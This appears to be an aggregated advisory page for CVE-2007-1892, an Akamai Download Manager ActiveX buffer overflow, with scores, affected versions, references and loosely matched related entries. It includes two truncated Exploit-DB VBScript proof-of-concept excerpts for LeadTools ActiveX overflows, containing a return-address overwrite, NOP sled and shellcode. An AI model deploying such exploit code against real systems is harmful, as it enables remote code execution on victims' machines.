CVE-2007-1892
Published: 2007-04-18
Priority P344, critical, 9.3 (CVSS 2.0)
AV:N/AC:M/Au:N/C:C/I:C/A:C
EPSS: 5.59% (91.9th percentile)
Stack-based buffer overflow in Akamai Technologies Download Manager ActiveX Control (DownloadManagerV2.ocx) before 2.2.1.0 allows remote attackers to execute arbitrary code via unspecified vectors, a different issue than CVE-2007-1891.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| akamai_technologies | download_manager | <= 2.2.4.3 | — |
| akamai_technologies | download_manager | — | — |
| akamai_technologies | download_manager | — | — |
| akamai_technologies | download_manager | — | — |
| akamai_technologies | download_manager | — | — |
| akamai_technologies | download_manager | — | — |
GHSA
GHSA-mmg7-q8j9-f8wj: Stack-based buffer overflow in manager
ghsa_unreviewed·2022-05-02·CVSS 9.3
CVE-2009-2582 [CRITICAL] CWE-119 GHSA-mmg7-q8j9-f8wj: Stack-based buffer overflow in manager
Stack-based buffer overflow in manager.exe in Akamai Download Manager (aka DLM or dlmanager) before 2.2.4.8 allows remote web servers to execute arbitrary code via a malformed HTTP response during a Redswoosh download, a different vulnerability than CVE-2007-1891 and CVE-2007-1892.
GHSA
GHSA-6j77-pv9h-rxpf: Stack-based buffer overflow in Akamai Technologies Download Manager ActiveX Control (DownloadManagerV2
ghsa_unreviewed·2022-05-01·CVSS 9.3
CVE-2007-1892 [CRITICAL] GHSA-6j77-pv9h-rxpf: Stack-based buffer overflow in Akamai Technologies Download Manager ActiveX Control (DownloadManagerV2
Stack-based buffer overflow in Akamai Technologies Download Manager ActiveX Control (DownloadManagerV2.ocx) before 2.2.1.0 allows remote attackers to execute arbitrary code via unspecified vectors, a different issue than CVE-2007-1891.
No detection rules found.
Exploit-DB
SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)
exploitdb·2011-09-20·CVSS 4.0
CVE-2011-1892 [MEDIUM] SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)
poc filename: xee.xsl
Exploit-DB
LeadTools Raster Thumbnail Object Library - 'LTRTM14e.dll' Remote Buffer Overflow
exploitdb·2007-05-18
CVE-2007-2787 LeadTools Raster Thumbnail Object Library - 'LTRTM14e.dll' Remote Buffer Overflow
---
2007/05/20
LeadTools Raster Thumbnail Object Library (LTRTM14e.DLL v. 14.5.0.44) Remote Stack-Based Buffer Overflow
url: http://www.leadtools.com/
peice: eheheh, take a look at their site :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 fully patched with Internet Explorer 7
This exploit just opens calc.exe
Sub tryMe
buff = String(1892, "A")
get_EIP = unescape("%EB%AA%3F%7E") 'call ESP (from user32.dll)
buff2 = String(40, "A")
nop = String(16, unescape("%90"))
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%
Exploit-DB
LeadTools Thumbnail Browser Control - 'lttmb14E.ocx' Remote Buffer Overflow
exploitdb·2007-05-18
CVE-2007-2787 LeadTools Thumbnail Browser Control - 'lttmb14E.ocx' Remote Buffer Overflow
---
2007/05/19
LeadTools Thumbnail Browser Control (lttmb14E.ocx v. 14.5.0.44) Remote Stack-Based Buffer Overflow
url: http://www.leadtools.com/
peice: eheheh, take a look at their site :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 fully patched with Internet Explorer 7
This exploit just opens calc.exe
Sub tryMe()
buff = String(1892, "A")
get_EIP = unescape("%EB%AA%3F%7E") 'call ESP (from user32.dll)
buff2 = String(40, "A")
nop = String(16, unescape("%90"))
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%30%42%33%3
No writeups or analysis indexed.
References:
http://secunia.com/advisories/24900
http://www.osvdb.org/34324
http://www.securityfocus.com/archive/1/465908/100/0/threaded
http://www.securityfocus.com/bid/23522
http://www.vupen.com/english/advisories/2007/1415
https://exchange.xforce.ibmcloud.com/vulnerabilities/33697